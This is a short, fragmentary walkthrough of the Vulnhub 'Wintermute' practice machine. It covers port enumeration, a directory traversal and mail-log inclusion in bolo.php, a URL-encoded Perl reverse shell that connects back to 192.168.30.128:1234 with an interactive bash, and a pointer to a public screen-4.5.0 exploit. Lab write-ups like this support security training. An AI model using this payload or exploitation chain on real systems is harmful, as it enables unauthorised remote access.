Write-Up On The Vulnhub Wintermute
Write-Up On The Vulnhub Wintermute
We can see the smtp server running at port 25 and the port 3000 which is running hadoop-
datanode. And other port 80 a http services.
As we can see we got some 3 folders name manual, freeside and Server-status.
When we open the manual folder we got apache manual, and for the freeside we got nothing, not
even the source code we got anything.
As we can see in the above page there is a hint given that default user and password are admin, so
let’s try will it work.
http://192.168.1.124/turing-bolo/bolo.php?bolo=case
From the above screenshot, we can see a few log files (as highlighted). Per our experience, this could
be an indication of Directory traversal where we can execute writeable files in the browser. Hence
let’s try to append ../../../log/mail to the URL in the browser as follows :
http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail
search in Google for “postfix log location” seems to suggest the logs are at /var/log/mail.log. This
plays well into our hands because of the .log extension. Let’s explore this path of attack.
Before urlencoding
After urlencoding
perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.30.128%22%3B%24p
%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp
%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i
%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E
%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-
i%22%29%3B%7D%3B%27
Copy and paste the urlencoded Perl reverse shell after cmd=. And … a shell at last.
When we searched for the screen-4.5.0 exploit, we found one public exploit.
https://www.exploit-db.com/exploits/41154